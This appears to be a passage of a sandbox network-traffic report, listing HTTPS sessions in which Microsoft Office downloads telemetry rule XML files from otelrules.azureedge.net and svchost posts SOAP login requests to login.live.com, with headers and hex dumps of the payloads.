                                                                                                                                                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 16f71f95-f01e-0099-73fb-259171000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210243Z-16849878b7828dsgct3vrzta70000000040000000000be2f
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                137192.168.2.54991413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 0df29f50-101e-005a-068d-27882b000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210243Z-16849878b785dznd7xpawq9gcn00000006ug00000000xnqf
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                138192.168.2.54991613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 27230864-a01e-0070-6533-26573b000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210243Z-17c5cb586f6w4mfs5xcmnrny6n0000000790000000006fte
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                139192.168.2.54991320.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:43 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4c9ad853-38a9-46cb-aa18-98137558864b
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF00011F5B V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11412
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                140192.168.2.54991720.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:44 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BL2
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 8fcd8ffc-9e81-4fdd-a182-88cfe3f1723c
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF00027924 V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                141192.168.2.54991813.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210244Z-16849878b785dznd7xpawq9gcn00000006xg00000000h4wm
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                142192.168.2.54992013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1390
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 903d1aff-701e-0050-019c-276767000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210244Z-16849878b782d4lwcu6h6gmxnw000000054g00000000v0rx
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                143192.168.2.54991913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
